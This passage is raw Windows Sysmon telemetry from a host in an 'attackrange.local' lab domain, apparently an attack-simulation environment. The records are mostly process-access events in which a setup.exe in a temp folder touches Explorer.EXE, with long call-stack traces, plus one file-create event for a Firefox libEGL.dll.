\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014917Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014916Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014915Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014914Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\libEGL.dll2021-01-18 13:59:52.364 10341000x800000000000000014913Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.364{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 